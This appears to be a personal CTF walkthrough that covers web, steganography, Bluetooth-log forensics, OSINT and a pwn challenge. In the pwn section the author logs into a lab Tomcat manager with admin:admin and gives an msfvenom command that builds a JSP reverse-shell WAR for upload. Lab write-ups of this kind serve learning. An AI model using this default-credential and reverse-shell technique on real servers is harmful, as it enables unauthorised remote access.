Sector443 CTF Walkthrough
This is where it all started I was watching an episode of The Boys when a friend of mine gave me a link to this CTF and asked me to play if I had the time, and I has plenty XD
Most of the challenges where based on reverse engineering binaries.
Web
The challenge had an HTML file when opened with a browser it gives a prompt to enter a password the end goal is to find the password which is the flag
Here is the code, By the looks of it I can see a load of variable declaration and looping by the hex thing looks promising by printing it on console it spits out some char codes
console.log("\x31\x30\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x32\x33\x2c\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x35");
Now we have a set of char codes which can then be converted using the String.fromCharCode function
print(String.fromCharCode(102, 108, 97,103,123,55,56,54,79,115,69,114,116,107,49,50,125));
Which returns the flag
Chasing and avenging the hydra's head Arnim Zola, captain america finally got control over the ship and crashed into the Arctic
going into a unconsciousness sleep of "steghide".
Releasing Next: Captain America "wintersoldier"
So we have steghide and wintersoldier which means only one thing.
and we have the flag flag{YzRwdDQxbl80bTNyMWM0}
Forensics
In this challenge we are given a btsnoop log file form which we have to find the unlock sequence and get the value which is the flag, We can view the log file on wireshark.
Now we have to find the Unlock Request , As the challenge description says the the unlock request is send through an app so the Source would be a Smart Phone and the destination is the Smart Lock
By Filtering the source and searching for a Value attribute I was able to figure out the Unlock request.
Osint
In this challenge the goal is to find a person whose name is "Peter Grulich" who likes ponies and we need to find the flag.I started my search in google by entering the following
By checking the Remove secret commit we have a flag
Pwn
In this challenge we have to download a VM and import it to virtual box in order to solve the challenge,Before that a Host only connection has to be made in order to access the box (which I didn't like) ,After importing the machine and staring it we have a static IP address.
By doing an NMAP on the IP address we can see that a port 8080 is open which is running Apache Tomcat
By checking the manager page we have a login prompt by trying admin:admin we are able to login to the app
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.x.x LPORT=xxxx -f war > shell.war
Now all we have to do is start an exploit handler on metasploit and upload the war file and execute it.